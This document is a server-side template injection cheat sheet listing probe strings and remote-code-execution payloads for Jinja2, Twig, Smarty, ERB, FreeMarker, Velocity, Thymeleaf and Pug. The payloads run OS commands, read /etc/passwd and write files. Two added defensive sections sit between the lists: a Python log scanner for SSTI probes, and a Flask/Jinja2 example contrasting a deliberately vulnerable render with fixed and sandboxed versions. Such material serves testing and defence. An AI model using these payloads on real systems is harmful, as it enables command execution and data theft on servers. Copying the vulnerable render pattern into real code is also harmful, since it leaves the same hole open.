Server-Side Template Injection exploitation techniques
Test for SSTI vulnerability across different engines
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
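As an added, defender-side example that is not part of the original cheat sheet: a small Python scanner that URL-decodes the request target from each line of a constructed access-log sample, flags the probe syntaxes listed above (grouped by the engine family that renders them), and then reports clients that sent probes for more than one engine family, which is what a tester cycling through this list looks like in logs. The log lines, the family labels and the function names are constructed for this example.

```python
import re
from urllib.parse import unquote

# Probe syntaxes from the list above, grouped by the engine family that renders them.
# The patterns are deliberately loose so they also match the longer payloads for the
# same engines, not only the 7*7 probes. Grouping labels are this example's own.
PROBE_PATTERNS = {
    "jinja2/twig (mustache)": re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S),
    "freemarker/thymeleaf (dollar)": re.compile(r"\$\{.*?\}", re.S),
    "erb (erb tag)": re.compile(r"<%=?.*?%>", re.S),
    "pug/velocity (hash)": re.compile(r"#\{.*?\}|#set\(", re.S),
    "smarty (brace)": re.compile(r"\{php\}|\{system\(", re.S),
}

# Constructed access-log sample: one benign request, three probes from one client
# (Jinja2-style, FreeMarker-style, ERB-style), and a benign single-brace query.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /profile?name=alice HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /profile?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 498',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /profile?name=%24%7B7*7%7D HTTP/1.1" 200 498',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /profile?name=%3C%25%3D%207*7%20%25%3E HTTP/1.1" 200 498',
    '10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /search?q=price+%7Busd%7D HTTP/1.1" 200 700',
]


def extract_request_target(log_line):
    """Pull the request target out of a combined-format log line and URL-decode it.

    Decoding first matters: probes normally arrive percent-encoded, so matching the
    raw line would miss them.
    """
    m = re.search(r'"(?:GET|POST|PUT|PATCH|DELETE) (\S+) HTTP/', log_line)
    return unquote(m.group(1)) if m else ""


def find_ssti_probes(log_lines):
    """Return (line_number, engine_family, matched_text) for every probe found."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        target = extract_request_target(line)
        for family, pattern in PROBE_PATTERNS.items():
            m = pattern.search(target)
            if m:
                hits.append((n, family, m.group(0)))
    return hits


def probing_clients(log_lines, min_families=2):
    """Client IPs that sent probes for at least `min_families` engine families.

    A single brace in a query string is common in normal traffic; several different
    template syntaxes from one source in a short window is the engine-enumeration
    pattern this list of probes produces.
    """
    families_by_ip = {}
    for n, family, _ in find_ssti_probes(log_lines):
        ip = log_lines[n - 1].split()[0]
        families_by_ip.setdefault(ip, set()).add(family)
    return {ip for ip, fams in families_by_ip.items() if len(fams) >= min_families}


if __name__ == "__main__":
    for hit in find_ssti_probes(SAMPLE_LOG):
        print("probe on line %d [%s]: %s" % hit)
    print("clients enumerating engines:", sorted(probing_clients(SAMPLE_LOG)))
```

A WAF signature on `{{` alone would page on the last sample line's `{usd}` style of false positive if written loosely; correlating distinct syntaxes per client, as `probing_clients` does, gives a far lower-noise alert than matching any single probe.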
Python Jinja2 template exploitation (Python, Flask)
{{config}}
{{config.items()}}
{{''.__class__.__mro__[1].__subclasses__()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('whoami').read()}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("ls").read()}}{%endif%}{%endfor%}
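Added example, not from the original page: the Flask-style bug these Jinja2 payloads target, shown as a render where user input is concatenated into the template source, next to the two standard fixes (user input passed as a variable to a fixed template, and a `jinja2.sandbox.SandboxedEnvironment` for the case where users legitimately supply template text). The function names are this example's own; the inputs exercised are the 7*7 probe and the `__mro__` walk from the list above.

```python
from jinja2 import Environment
from jinja2.exceptions import SecurityError, UndefinedError
from jinja2.sandbox import SandboxedEnvironment

# Constructed inputs: the arithmetic probe and the subclass walk from the list above.
PROBE = "{{7*7}}"
MRO_WALK = "{{''.__class__.__mro__[1].__subclasses__()}}"


def render_vulnerable(user_input):
    """The bug: user input becomes part of the template *source*.

    Flask's render_template_string(f"Hello {user_input}") is the same mistake; any
    {{ }} or {% %} in the input is evaluated by the engine.
    """
    return Environment().from_string("Hello " + user_input).render()


# Fix 1: the template is a constant; user input only ever arrives as *data*.
GREETING = Environment(autoescape=True).from_string("Hello {{ name }}")


def render_fixed(user_input):
    return GREETING.render(name=user_input)


# Fix 2 (defence in depth, for when users really do author templates): render
# inside the sandbox, which refuses underscore-prefixed attributes such as __class__.
SANDBOX = SandboxedEnvironment(autoescape=True)


def render_sandboxed(user_template):
    """Return ("rendered", text) or ("blocked", reason).

    UndefinedError is caught as well, because the sandbox returns an undefined value
    for an unsafe attribute and the failure surfaces as SecurityError or
    UndefinedError depending on how the payload continues from there.
    """
    try:
        return ("rendered", SANDBOX.from_string(user_template).render())
    except (SecurityError, UndefinedError) as exc:
        return ("blocked", str(exc))


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(PROBE))   # engine evaluates the probe
    print("fixed:     ", render_fixed(PROBE))        # probe comes back as literal text
    print("sandbox:   ", render_sandboxed(PROBE))    # arithmetic is fine in the sandbox
    print("sandbox:   ", render_sandboxed(MRO_WALK)) # attribute walk is refused
```

The sandbox is not a substitute for fix 1: it limits what a user-authored template can reach, but the right default is that user input never becomes template source at all.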
PHP Twig template exploitation (PHP, Symfony)
{{7*7}}
{{_self.env.display("hello")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}
{{['id']|filter('system')}}
PHP Smarty template exploitation (PHP)
{system('whoami')}
{php}echo `whoami`;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"",self::clearConfig())}
Ruby ERB template exploitation (Ruby, Rails)
<%= 7*7 %>
<%= system("whoami") %>
<%= `whoami` %>
<%= File.open('/etc/passwd').read %>
Java FreeMarker template exploitation (Java)
${7*7}
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("whoami") }
${"freemarker.template.utility.Execute"?new()("id")}
Apache Velocity template exploitation (Java)
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end
Spring Thymeleaf template exploitation (Java, Spring)
${7*7}
${T(java.lang.Runtime).getRuntime().exec('whoami')}
__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("whoami").getInputStream()).next()}__::.x
Node.js Pug/Jade template exploitation (Node.js)
#{7*7}
#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('whoami')}()}